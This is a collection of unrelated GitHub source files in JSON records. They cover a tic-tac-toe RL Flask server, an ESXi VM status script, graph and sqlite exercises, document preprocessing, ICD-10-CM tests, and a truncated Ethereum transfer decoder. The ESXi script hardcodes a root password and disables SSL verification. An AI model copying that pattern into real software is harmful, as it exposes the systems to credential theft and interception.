Flask(__name__)\r\nCORS(app)\r\n\r\n\r\n@app.route('/new-game', methods=['POST'])\r\ndef configNewGame():\r\n global agent\r\n if not request.json:\r\n abort(400)\r\n print(request.json)\r\n gameConfig['level'] = request.json['level']\r\n \r\n if(gameConfig['level'] == 'Easy'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(1000)\r\n print(\"After 1000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n elif(gameConfig['level'] == 'Medium'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(5000)\r\n print(\"After 5000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n elif(gameConfig['level'] == 'Impossible'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(30000)\r\n print(\"After 30000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n\r\n@app.route('/play-game', methods=['POST'])\r\ndef bot_turn():\r\n if not request.json:\r\n abort(400)\r\n board, turn = request.json['board'], request.json['turn']\r\n demo_game_stats(agent)\r\n if ' ' in board:\r\n game = agent.NewGame()\r\n game.state = ''.join(board)\r\n if turn == 'X':\r\n game.player = 'O'\r\n if turn == 'O':\r\n game.player == 'X'\r\n move = agent.play_select_move(game)\r\n board = list(move)\r\n print(board)\r\n return jsonify({'board': board, 'turn':game.player,'success': True}), 201\r\n else:\r\n print(board)\r\n return jsonify({'board': board, 'success': False}), 201\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run()\r\n","repo_name":"monstertau/tic-tac-toe-rl","sub_path":"tic-tac-toe-rl-backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21410578141","text":"from pyVim import connect\nfrom pyVmomi import vim\nimport sys\n\n# Gets virtual machine from name\ndef getVM(content, name):\n obj = None\n container = content.viewManager.CreateContainerView(\n content.rootFolder, [vim.VirtualMachine], True)\n for c in container.view:\n if name:\n if c.name == name:\n obj = c\n break\n else:\n obj = c\n break\n return obj\n\n# Connect to ESXi\nconnection = connect.ConnectNoSSL(\"192.168.182.132\", 443, \"root\", \"ddos\")\n\ndef isOnline(vmName):\n vm = getVM(connection.content, vmName)\n\n # If VM doesn't exist\n if (vm == None):\n print (\"404\", flush = True)\n return False\n\n if (vm.runtime.powerState == \"poweredOff\"):\n print (\"Off\", flush = True)\n return False\n else:\n print(\"On\", flush = True)\n return True\n\n\n# Run function\nisOnline(sys.argv[1])\n\n# Disconnect from ESXi\nconnect.Disconnect(connection)","repo_name":"nkomarn/ESXi-Panel","sub_path":"isOnline.py","file_name":"isOnline.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29956256220","text":"import heapq\r\ndef prim(idx, v):\r\n visit = [False]*(v+1)\r\n visit[idx] = True\r\n cnt = 1\r\n res = 0\r\n h = []\r\n for target in graph[idx]:\r\n heapq.heappush(h, target)\r\n while h:\r\n cost, a = heapq.heappop(h)\r\n if not visit[a]:\r\n visit[a] = True\r\n cnt += 1\r\n res += cost\r\n for target in graph[a]:\r\n heapq.heappush(h, target)\r\n if cnt == v:\r\n return 
res\r\n return 0\r\n\r\nV, E = map(int,input().split())\r\ngraph = [[] for _ in range(V+1)]\r\nfor i in range(E):\r\n a, b, cost = map(int,input().split())\r\n graph[a].append((cost,b))\r\n graph[b].append((cost,a))\r\nprint(prim(1,V))","repo_name":"sururuu/TIL","sub_path":"Baekjoon_Algorithm/1197_최소 스패닝 트리_sol2.py","file_name":"1197_최소 스패닝 트리_sol2.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30628861128","text":"import sqlite3\n\nconn = sqlite3.connect('my_friends.db');\nc = conn.cursor();\n\nc.execute('CREATE TABLE friends(first_name TEXT, last_name TEXT, closeness INT)');\n\ndata = ('Perry', 'Kid', 7);\nquery = \"INSERT INTO friends VALUES(?,?,?)\";\nc.execute(query, data);\n\npeople = [\n ('Jennifer', 'Al', 4),\n ('Daniel', 'Boom', 6),\n ('Cat', 'Zee', 2),\n ('James', 'Mid', 8),\n]\n\nc.executemany(query, people);\n\nc.execute('SELECT * FROM friends;');\n\n# Iterate over cursor\nfor result in c:\n print(result);\n\n# fetch all the results\npeople_list = c.fetchall();\nprint(people_list);\n\n# fetch only first one result\nc.execute('SELECT * FROM friends WHERE first_name = \"Perry\";');\nprint(c.fetchone());\n\nc.execute(\"SELECT * FROM friends WHERE closeness > 5\");\nprint(c.fetchall());\n\nconn.commit();\nconn.close();","repo_name":"ptyadana/Python-Projects-Dojo","sub_path":"02.Modern Python 3 Bootcamp - CS/35.Python + SQL/friends/friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"13454365143","text":"#!python\n\"\"\"\nA modification of traditional Game of Life such that each cell has randomly\ninitiated probabilities.\n\nIt's possible to do Markov, but the probabilities need to be normalized\n against each other and stored in a temporary array. Then the central cell\n will make it flip along this weights and the chosen cell will turn on in\n the next round. In this model the probabilities of each cell never change,\n and the cell that is 'alive' or 'dead' must be initialized up front. In\n other words, there are only ever n agents in the simulation at one time,\n moving from cell to cell.\n\n\"\"\"\nimport random\nimport sys\n\nfrom settings import height, width\nfrom tradmodel import tradModel\n\n\nclass markovModelNormalized(tradModel):\n\n def __init__(self, grid_model, next_grid_model):\n self.grid_model = grid_model\n self.next_grid_model = next_grid_model\n\n def randomize(self, grid, width, height):\n for i in range(0, height):\n for j in range(0, width):\n rand_val = random.random()\n if rand_val > 0.9:\n grid[i][j] = {'On': 1, 'rand_val': rand_val}\n else:\n grid[i][j] = {'On': 0, 'rand_val': rand_val}\n self.grid_model = grid\n\n def next_gen(self):\n alive_cells = set()\n for i in range(0, height):\n for j in range(0, width):\n if self.grid_model[i][j]['On'] == 1 and (\n i, j) not in alive_cells:\n coordinates, weights = self.markov_logic(i, j)\n next_cell_x, next_cell_y = self.outcome_logic(i, j,\n coordinates, weights)\n alive_cells.add((next_cell_x, next_cell_y))\n temp = self.grid_model\n self.grid_model = self.next_grid_model\n self.next_grid_model = temp\n\n def markov_logic(self, i, j):\n # ex. 
{(x, y): 0.50}\n probabilities = self.count_neighbor_probabilities((i, j))\n # not allowing you to choose cells that are off the grid:\n probabilities = {k: v for k, v in probabilities.items() if\n (k[0] >= 0 and k[0] <= width) and (\n k[1] >= 0 and k[1] <= height)}\n cell_probabilities_totaled = sum(v for v in probabilities.values())\n coords_w_normalized_weights = {k: v / cell_probabilities_totaled for\n k, v in probabilities.items()}\n coordinates = list(coords_w_normalized_weights.keys())\n weights = list(coords_w_normalized_weights.values())\n return coordinates, weights\n\n def outcome_logic(self, i, j, coordinates, weights):\n next_cell_x, next_cell_y = random.choices(coordinates, weights)[0]\n self.grid_model[i][j]['On'] = 0\n self.next_grid_model[next_cell_x][next_cell_y]['On'] = 1\n return next_cell_x, next_cell_y\n\n def count_neighbor_probabilities(self, cell_coord):\n row, col = cell_coord\n cell_prob_dict = {}\n neighbor_cells = [(row - 1, col - 0), (row - 1, col - 1),\n (row - 1, col + 1), (row - 0, col - 1), (row - 0, col + 1),\n (row + 1, col + 0), (row + 1, col - 1), (row + 1, col + 1)]\n # adds probability if cell is on the grid and unoccupied\n for x, y in neighbor_cells:\n try:\n if not self.next_grid_model[x][y]['On']:\n cell_prob_dict[(x, y)] = self.grid_model[x][y]['rand_val']\n except IndexError: # hit edge of the grid\n continue\n return cell_prob_dict\n\n def load_pattern(self, pattern, x_offset=0, y_offset=0):\n global grid_model\n\n # init to clear the grid:\n for i in range(0, height):\n for j in range(0, width):\n rand_val = random.random()\n grid_model[i][j] = self.cell(On=0, rand_val=rand_val)\n\n # this is offsetting by y amount, to apply the pattern wherever you\n # like.\n j = y_offset\n\n for row in pattern:\n # offset by x amount.\n i = x_offset\n for value in row:\n rand_val = random.random()\n grid_model[i][j] = self.cell(On=value, rand_val=rand_val)\n i = i + 1\n j = j + 1\n","repo_name":"Travis42/conway-experiment","sub_path":"markov_model.py","file_name":"markov_model.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19803028827","text":"import tqdm\nfrom haystack import Document\nfrom haystack.utils import convert_files_to_docs\nfrom sentence_transformers import SentenceTransformer, util\nfrom setfit import SetFitModel\nimport re\n\nfrom killer_bots.search_engine.utils import change_extentions_to_txt\n\n\ndef clean_wiki_text(text: str) -> str:\n # get rid of multiple new lines\n while \"\\n\\n\" in text:\n text = text.replace(\"\\n\\n\", \"\\n\")\n\n # get rid of multiple spaces\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n # add paragraphs (identified by wiki section title which is always in format \"==Some Title==\")\n text = text.replace(\"\\n==\", \"\\n\\n\\n==\")\n\n # remove empty paragrahps\n text = re.sub(r\"(==.*==\\n\\n\\n)\", \"\", text)\n\n # remove multiple dashes\n text = re.sub(r\"#+ +\", \"\", text)\n text = re.sub(r\" +#+\", \"\", text)\n\n text = re.sub(r\"\\n +\\n\", \"\\n\", text)\n\n # remove all links from markdown text\n text = re.sub(r\"\\[(.*?)\\]\\(.*?\\)\", r\"\\1\", text)\n\n # remove all images from markdown text\n text = re.sub(r\"!\\[(.+)\\]\\(.+\\)\", \"\", text)\n\n return text.strip()\n\n\ndef get_docs_text(docs):\n return '\\n'.join([clean_wiki_text(doc.content) for doc in docs])\n\n\ndef join_docs(docs):\n if set([doc.meta[\"name\"] for doc in docs]) == 1:\n print(docs)\n raise 
Exception(\"All docs must have the same name\")\n return Document(content=get_docs_text(docs), meta=docs[0].meta)\n\n\nclass PreprocessDocs:\n def __init__(self):\n self.similarity_model = SentenceTransformer(\"all-MiniLM-L6-v2\")\n self.is_title_model = SetFitModel.from_pretrained(\"AlekseyKorshuk/is-title-setfit\", device=\"cuda\")\n self.small_threshold = 0.1\n self.threshold = 0.35\n self.next_threshold = 0.4\n\n def get_score(self, text1, text2):\n text1 = clean_wiki_text(text1)\n text2 = clean_wiki_text(text2)\n embeddings = self.similarity_model.encode([text1, text2], convert_to_tensor=True)\n cosine_scores = util.cos_sim(embeddings, embeddings)\n # if \"technical debt\" in text1 or \"technical debt\" in text2:\n # print(\"#\" * 100)\n # print(text1)\n # print(text2)\n # print(cosine_scores[0][1])\n # input()\n\n return cosine_scores[0][1]\n\n def is_title(self, text):\n return self.is_title_model([clean_wiki_text(text)])[0] == 1\n\n def split_last_titles(self, docs):\n last_docs = []\n docs = docs.copy()\n doc = docs[-1]\n while self.is_title(doc.content):\n last_docs.append(doc)\n docs.pop()\n try:\n doc = docs[-1]\n except:\n # print(last_docs)\n break\n last_docs.reverse()\n return docs, last_docs\n\n def __call__(self, docs):\n prepared_docs = []\n current_docs = [docs[0]]\n for i, doc in tqdm.tqdm(enumerate(docs[1:]), total=len(docs[1:]), desc=\"Preprocessing docs\"):\n if doc.meta['name'] != current_docs[-1].meta['name']:\n prepared_docs.append(join_docs(current_docs))\n current_docs = [doc]\n continue\n if len(current_docs) == 0:\n import pdb;\n pdb.set_trace()\n score = self.get_score(get_docs_text(current_docs), doc.content)\n add_flag = False\n if score > self.threshold and current_docs[-1].meta['name'] == doc.meta['name']:\n add_flag = True\n elif self.is_title(get_docs_text(current_docs)) and score > self.small_threshold:\n add_flag = True\n else:\n next_score = self.get_score(\n get_docs_text(current_docs) + '\\n' + doc.content,\n docs[i + 2].content\n )\n if next_score > self.next_threshold and current_docs[-1].meta['name'] == docs[i + 2].meta['name']:\n add_flag = True\n if add_flag:\n current_docs.append(doc)\n if i == len(docs) - 2:\n # if \"technical debt\" in get_docs_text(current_docs):\n # print(\"!\" * 100)\n # print(get_docs_text(current_docs))\n # print(\"!\" * 100)\n prepared_docs.append(join_docs(current_docs))\n else:\n current_docs, last_docs = self.split_last_titles(current_docs)\n if len(current_docs) > 0:\n # if \"technical debt\" in get_docs_text(current_docs):\n # print(\"!\" * 100)\n # print(get_docs_text(current_docs))\n # print(\"!\" * 100)\n prepared_docs.append(join_docs(current_docs))\n current_docs = last_docs + [doc]\n return prepared_docs\n\n\ndef preprocess_docs(docs):\n return PreprocessDocs()(docs)\n\n\nclass PreprocessDocsFast:\n def __init__(self):\n pass\n\n def is_title(self, text):\n return text.startswith(\"#\")\n\n def is_all_title(self, docs):\n return all([self.is_title(doc.content) for doc in docs])\n\n def __call__(self, docs):\n prepared_docs = []\n for i, doc in enumerate(docs):\n doc.meta[\"id\"] = i\n current_docs = [docs[0]]\n for i, doc in tqdm.tqdm(enumerate(docs[1:]), total=len(docs[1:]), desc=\"Preprocessing docs\"):\n is_title = self.is_title(doc.content)\n if is_title:\n if not self.is_all_title(current_docs):\n prepared_docs.append(join_docs(current_docs))\n current_docs = [doc]\n elif len(clean_wiki_text(doc.content)) > 0:\n current_docs.append(doc)\n if len(current_docs) > 0 and not 
self.is_all_title(current_docs):\n prepared_docs.append(join_docs(current_docs))\n\n prepared_docs = [doc for doc in prepared_docs if str(doc.content).count(\"\\n\") < 5]\n return prepared_docs\n\n\nif __name__ == \"__main__\":\n doc_dir = './killer_bots/bots/code_guru/database/'\n change_extentions_to_txt(doc_dir)\n docs = convert_files_to_docs(dir_path=doc_dir, clean_func=None, split_paragraphs=True)\n preprocessor = PreprocessDocs()\n prepared_docs = preprocessor(docs)\n\n for doc in prepared_docs:\n print(doc)\n print(\"#\" * 100)\n","repo_name":"AlekseyKorshuk/killer-bots","sub_path":"killer_bots/search_engine/preprocess_docs.py","file_name":"preprocess_docs.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42990850","text":"n = int(input())\n\nla, lb = input().split()\nla, lb = int(la), int(lb)\n\nsa, sb = input().split()\nsa, sb = int(sa), int(sb)\n\nif (n < la) or (n > lb) or (n < sa) or (n > sb):\n print(\"impossivel\")\nelse:\n print(\"possivel\")\n","repo_name":"tavaresmat/URI-Problems","sub_path":"1794_lavanderia.py","file_name":"1794_lavanderia.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2750992335","text":"#!/usr/bin/python3\n\"\"\"Starts a web application\"\"\"\nfrom os import environ\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/maze/', strict_slashes=False)\ndef maze():\n \"\"\"do we really need the python part to make the maze run?\"\"\"\n return render_template('maze.html')\n\n\nif __name__ == \"__main__\":\n \"\"\" Main Function \"\"\"\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"rkbrian/holberton_presentation","sub_path":"maze_generator/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70084073526","text":"# Crea un diccionario que represente los juegos de una consola, donde las\n# claves son los nombres de los juegos y los valores son las puntuaciones\n# correspondientes. 
Solicita al usuario el nombre de un juego y luego su\n# puntuación, si el juego no existe agregarlo y si existe actualizar su puntuación\n\ndiccionario = {\"Mario Bros\" : 10, \"Battlefield\" : 8, \"Valorant\" : 15}\n\nnombre_ingresado = input(\"Ingrese el nombre del juego\")\npuntuacion_ingresada_txt = input(\"Ingrese la puntuacion del juego\")\npuntuacion_ingresada_int = int(puntuacion_ingresada_txt)\n\n\n# Se tuvo que hacer con if in, ya que cada vez que se agrega un elemento al diccionario usando for tira error\nif (nombre_ingresado in diccionario): \n diccionario[nombre_ingresado] = puntuacion_ingresada_int\nelse:\n diccionario[nombre_ingresado] = puntuacion_ingresada_int\n\nprint(diccionario)","repo_name":"MarianoAquino6/UTN-First-Semester-Exercises-2023","sub_path":"DICTIONARIES/ejercicio_18.py","file_name":"ejercicio_18.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38297300545","text":"import os\nfrom transformers.data.processors.utils import DataProcessor, InputExample\nfrom tqdm import tqdm\nimport random\nimport code\n\nclass NatcatProcessor(DataProcessor):\n \"\"\"Processor for the Natcat data set.\"\"\" \n def __init__(self):\n super(NatcatProcessor, self).__init__()\n\n def get_examples(self, filepath):\n \"\"\"See base class.\"\"\"\n \"\"\"\n filepath: the file of article-category pairs \n \"\"\"\n examples = []\n i = 0\n with open(filepath) as fin:\n lines = fin.read().strip().split(\"\\n\")\n for line in tqdm(lines):\n line = line.strip().split(\"\\t\")\n\n pos_cats = line[:1]\n neg_cats = line[len(pos_cats):-1]\n article = line[-1]\n for pos_cat in pos_cats:\n examples.append(InputExample(guid=i, text_a=pos_cat, text_b=article, label='1'))\n i += 1\n for neg_cat in neg_cats:\n examples.append(InputExample(guid=i, text_a=neg_cat, text_b=article, label='0'))\n i += 1\n\n\n return examples \n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\"]\n\nclass EvalProcessor:\n def __init__(self, cat_file_path):\n super(EvalProcessor, self).__init__()\n self.cats = []\n with open(cat_file_path) as fin:\n for line in fin.read().strip().split(\"\\n\"):\n self.cats.append(line.strip())\n\n def get_examples(self, filepath):\n \"\"\"See base class.\"\"\"\n \"\"\"\n filepath: the file of the evaluation dataset \n \"\"\"\n examples = []\n labels = []\n i = 0\n with open(filepath) as fin:\n lines = fin.read().strip().split(\"\\n\")\n for line in tqdm(lines):\n line = line.strip().split(\",\", 1)\n if line[0].startswith(\"'\") or line[0].startswith('\"'):\n line[0] = line[0][1:-1]\n label = int(line[0]) - 1\n text = \" \".join(line[1][1:-1].split()[:128])\n if text.strip() == \"\":\n text = \"N/A\"\n for cat in self.cats:\n i += 1\n if cat == self.cats[label]:\n examples.append(InputExample(guid=i, text_a=cat, text_b=text, label=1))\n else:\n examples.append(InputExample(guid=i, text_a=cat, text_b=text, label=0))\n\n return examples\n\n def get_labels(self):\n return [0, 1]\n\nprocessors = {\n \"natcat\": NatcatProcessor,\n \"eval\": EvalProcessor,\n}\n\noutput_modes = {\n \"natcat\": \"classification\",\n \"eval\": \"classification\",\n}\n\ndef simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\ndef compute_metrics(task_name, preds, labels):\n if task_name in [\"wikicat\"]:\n return {\"acc\": simple_accuracy(preds, labels)}\n if task_name in [\"eval\"]:\n return {\"acc\": simple_accuracy(preds, labels)}\n\nclass DataFiles:\n def 
__init__(self, directory):\n self.all_files = [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".data\")]\n self.todo_files = self.all_files\n\n def next(self):\n if len(self.todo_files) == 0:\n return None\n return self.todo_files.pop()\n\n def save(self, file_path):\n with open(file_path, \"w\") as fout:\n for f in self.todo_files:\n fout.write(f + \"\\n\")\n\n def load(self, file_path):\n self.todo_files = []\n with open(file_path) as fin:\n for f in fin:\n self.todo_files.append(f.strip())\n\n\n","repo_name":"ZeweiChu/ULR","sub_path":"single-encoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"2672656768","text":"import os\nimport random\nfrom difflib import SequenceMatcher\n\nimport hypothesis\nimport hypothesis.strategies as st\nimport pytest\nimport requests\nimport untangle\nfrom hypothesis import assume, given, settings\n\nfrom icd.base import ICDChapter, ICDEntry\nfrom icd.rev10cm import (ICD10CMBlock, ICD10CMCategory, ICD10CMChapter,\n ICD10CMRoot, download_from_CDC, get_codex)\n\n\n@pytest.fixture(params=[\"2019\", \"2020\", \"2021\", \"2022\"], scope=\"session\")\ndef codex(request):\n return get_codex(release=request.param)\n\n\n@given(\n chapter_num=st.integers(1,3000),\n start_code=st.characters(min_codepoint=65, max_codepoint=90),\n mid_code=st.characters(min_codepoint=65, max_codepoint=90),\n end_code=st.characters(min_codepoint=65, max_codepoint=90)\n)\n@settings(suppress_health_check=hypothesis.HealthCheck.all())\ndef test_entry(chapter_num, start_code, mid_code, end_code):\n \"\"\"\n Test basic functionalities of the individual ICD-10-CM entries.\n \"\"\"\n assume(start_code <= mid_code < end_code)\n release = \"testrelease\"\n root = ICD10CMRoot(release=release)\n chapter = ICD10CMChapter(chapter_num, \"Test Chapter\")\n block = ICD10CMBlock(code=f\"{start_code}-{end_code}\", title=\"Test Block\")\n sub_block1 = ICD10CMBlock(code=mid_code, title=\"Test Subblock 1\")\n sub_block2 = ICD10CMBlock(\n code=chr(ord(mid_code) + 1),\n title=\"Test Subblock 2\"\n )\n category = ICD10CMCategory(f\"{mid_code}.1\", \"Test category\")\n\n root.add_child(chapter)\n chapter.add_child(block)\n assert block.should_contain(sub_block1), \"Block should contain sub block 1\"\n block.add_child(sub_block1)\n assert root.tree(print_out=False) == sub_block1.ancestry(print_out=False), (\n \"For linear tree, `tree()` and `ancestry()` must be same\"\n )\n assert block.should_contain(sub_block2), \"Block should contain sub block 2\"\n block.add_child(sub_block2)\n sub_block1.add_child(category)\n\n assert root.exists(chapter.code), \"chapter doesn't seem to exist\"\n assert chapter in root.search(chapter.code), \"Didn't find chapter\"\n with pytest.raises(AttributeError):\n _ = root.chapter\n with pytest.raises(AttributeError):\n _ = root.block\n with pytest.raises(AttributeError):\n _ = chapter.block\n\n assert root.exists(block.code), \"block doesn't seem to exist\"\n assert block in root.search(block.code), \"Didn't find block\"\n assert block.chapter == chapter, \"Block's chapter wrong\"\n\n assert root.exists(sub_block1.code), \"sub block 1 doesn't seem to exist\"\n assert sub_block1 in root.search(sub_block1.code), \"Didn't find sub_block1\"\n assert sub_block1.chapter == chapter, \"Sub block 1's chapter wrong\"\n\n assert root.exists(sub_block2.code), \"sub block 2 doesn't seem to 
exist\"\n assert sub_block2 in root.search(sub_block2.code), \"Didn't find sub_block2\"\n assert sub_block2.chapter == chapter, \"Sub block 2's chapter wrong\"\n\n assert root.exists(category.code), \"category doesn't seem to exist\"\n assert category in root.search(category.code), \"Didn't find category\"\n assert category.chapter == chapter, \"Category's chapter wrong\"\n assert category.block == sub_block1, \"Category's block wrong\"\n\n assert chapter in root.children, \"Chapter isn't child of root\"\n assert block in chapter.children, \"Block isn't child of chapter\"\n assert sub_block1 in block.children, \"Sub block 1 isn't child of block\"\n assert sub_block2 in block.children, \"Sub block 2 isn't child of block\"\n\n assert chapter.parent == root, \"Root isn't parent of chapter\"\n assert block.parent == chapter, \"Chapter isn't parent of block\"\n assert sub_block1.parent == block, \"Block isn't parent of sub block 1\"\n assert sub_block2.parent == block, \"Block isn't parent of sub block 2\"\n\n block.remove_child(sub_block2)\n\n assert sub_block2.parent is None, \"Removed child still has parent\"\n assert sub_block2 not in block.children, \"Removed child is still child\"\n\n chapter.add_child(sub_block2)\n\n assert sub_block2 not in chapter.children, (\n \"sub block 2 should have been added to the block, not the chapter\"\n )\n assert sub_block2 in block.children, \"sub block 2 schould be block's child\"\n assert sub_block2.parent == block, \"Sub block 2 parent is not block\"\n\n\ndef test_entries(codex):\n entries = list(codex.entries)\n entry_subset = random.sample(entries, k=100)\n revision = \"10-CM\"\n release = codex.release\n\n for entry in entry_subset:\n assert codex.exists(entry.code), \"entry does not seem to exist\"\n assert entry in codex.search(entry.code), \"entry not in search results\"\n assert entry.revision == revision, \"Not all entries have same revision\"\n assert entry.release == release, \"Not all entries have the same release\"\n assert entry.root == codex, \"Root of entries must be codex root\"\n assert all([child.parent == entry for child in entry.children]), (\n \"All entrie's children must have entry as parent.\"\n )\n sum_len_children = sum([len(child) for child in entry.children])\n assert len(entry) == sum_len_children + 1, (\n \"Length of entry must match sum of length of children + 1\"\n )\n if entry.depth_in_kind > 1:\n assert type(entry.parent) == type(entry), (\n \"If `depth_in_kind` is larger than 1, parent and child must be \"\n \"same type.\"\n )\n tree_str = entry.tree(print_out=False)\n num_lines = tree_str.count(\"\\n\")\n assert num_lines == len(list(entry.entries)), (\n \"Tree must list all entries under current\"\n )\n\n\ndef test_request(codex):\n \"\"\"\n Test whether the ICD API request works. Run this test only for the\n latest ICD-10-CM release. 
Apparently, some entries are stored differently\n on the CDC API than in the data they release, which is why some 'fuzzy'\n testing is required.\n \"\"\"\n if codex.release == \"2022\":\n leaves = list(codex.leaves)\n leaf_subset = random.sample(leaves, k=10)\n\n for leaf in leaf_subset:\n response_list = leaf.request()\n for response in response_list:\n assert leaf.code in response[0], (\n \"Responded code not same as leaf code\"\n )\n leaf_title = leaf.title.lower()\n response_title = response[1].lower()\n seqmatch = SequenceMatcher(None, leaf_title, response_title)\n assert leaf_title in response_title or seqmatch.ratio() >= 0.8, (\n f\"Responded title: {response_title}, \"\n f\"Stored title: {leaf_title}\"\n )\n\n\ndef test_root(codex):\n root = codex\n assert isinstance(root, ICD10CMRoot), \"Root must be `ICD10CMRoot` object.\"\n assert root.code == \"ICD-10-CM root\", \"Root has wrong code\"\n exp_title = (\n \"International Classification of Diseases, Tenth Revision, Clinical \"\n f\"Modification, {root.release} release\"\n )\n assert root.title == exp_title, \"Root has wrong title\"\n assert all([isinstance(child, ICD10CMChapter) for child in root.children]), (\n \"All children of root entry must be chapters\"\n )\n assert root.kind == \"root\"\n assert root.parent is None, \"Root cannot have parents.\"\n assert root.is_root, \"Root must have `is_root == True`.\"\n assert not root.is_leaf, \"Root cannot be leaf.\"\n assert root.root == root, \"Root of root must be root.\"\n assert hasattr(root, \"chapters\")\n for code, chapter in root.chapters.items():\n assert chapter.code == code, \"Chapters dict of root incorrect\"\n\n\ndef test_chapter(codex):\n chapters = codex.children\n for chapter in chapters:\n assert isinstance(chapter, ICD10CMChapter), (\n \"Chapter must be instance of `ICD10CMChapter`\"\n )\n assert chapter.kind == \"chapter\", \"Chapter must be of kind 'chapter'\"\n assert all([isinstance(child, ICD10CMBlock) for child in chapter.children]), (\n \"Children of chapters must be blocks\"\n )\n assert isinstance(chapter.parent, ICD10CMRoot), (\n \"Parent of chapter must be root\"\n )\n assert hasattr(chapter, \"blocks\")\n for code, block in chapter.blocks.items():\n assert block.code == code, \"Blocks dict of chapter incorrect\"\n\n\ndef test_codex(codex):\n \"\"\"\n Test some core functionalities of a loaded codex.\n \"\"\"\n assert isinstance(codex, ICD10CMRoot), (\n \"`get_codex()` did not return root object\"\n )\n assert all([isinstance(child, ICDChapter) for child in codex.children]), (\n \"Children of root must be chapters\"\n )\n len_codex = len(codex)\n assert len_codex > 1, \"Codex contains only root entry\"\n assert len_codex == len(list(codex.entries)), (\n \"`len` does not seem to report number of entries\"\n )\n assert len_codex >= len(list(codex.leaves)), (\n \"Codex must have more entries than leaves\"\n )\n assert all([leaf.is_leaf for leaf in codex.leaves]), (\n \"Iterator over leaves returned objects that aren't leaves\"\n )\n assert all([isinstance(entry, ICDEntry) for entry in codex.entries]), (\n \"Not all entries are ICD objects\"\n )\n\n\n@pytest.mark.parametrize(\"release\", [\"2019\", \"2020\", \"2021\", \"2022\"])\ndef test_download_from_CDC(tmpdir, release):\n \"\"\"\n Make sure downloading from the CDC website works.\n \"\"\"\n with pytest.raises(requests.RequestException):\n download_from_CDC(custom_url=\"https://made.up/file.xml\")\n\n with pytest.raises(IOError):\n download_from_CDC(save_path=\"/made/up/path\")\n\n 
download_from_CDC(release=release, save_path=tmpdir)\n tmp_file_path = tmpdir / f\"icd10cm_tabular_{release}.xml\"\n assert os.path.exists(str(tmp_file_path)), (\n f\"Temporary directory {tmp_file_path} does not exist\"\n )\n xml_root = untangle.parse(tmp_file_path).ICD10CM_tabular\n codex = ICD10CMRoot.from_xml(xml_root)\n assert isinstance(codex, ICD10CMRoot), (\n \"Codex was not created\"\n )\n","repo_name":"rmnldwg/icd","sub_path":"tests/rev10cm_test.py","file_name":"rev10cm_test.py","file_ext":"py","file_size_in_byte":10065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"133017008","text":"from typing import List\n\nfrom ethtx.models.decoded_model import DecodedCall, DecodedTransfer, AddressInfo\nfrom ethtx.utils.measurable import RecursionLimit\nfrom .abc import ABISubmoduleAbc\n\nRECURSION_LIMIT = 2000\nZERO_ADDRESS = \"0x\" + 40 * \"0\"\n\n\nclass ABITransfersDecoder(ABISubmoduleAbc):\n \"\"\"Abi Transfers Decoder.\"\"\"\n\n def decode(self, call: DecodedCall, events, proxies) -> List:\n \"\"\"Decode transfers.\"\"\"\n transfers = []\n\n def _transfers_calls(decoded_call):\n if decoded_call.status and decoded_call.value:\n transfers.append(\n DecodedTransfer(\n from_address=decoded_call.from_address,\n to_address=decoded_call.to_address,\n token_standard=\"ETH\",\n token_address=ZERO_ADDRESS,\n token_symbol=\"ETH\",\n value=decoded_call.value,\n )\n )\n if decoded_call.subcalls:\n for sub_call in decoded_call.subcalls:\n _transfers_calls(sub_call)\n\n if call:\n with RecursionLimit(RECURSION_LIMIT):\n _transfers_calls(call)\n\n for event in events:\n # signatures of Transfer event valid for ERC20 and ERC721 and\n # TransferSingle for ERC1155\n if event.event_signature in (\n \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\",\n \"0xc3d58168c5ae7397731d063d5bbf3d657854427343f4c083240f7aacaa2d0f62\",\n ):\n # Transfer event\n if (\n 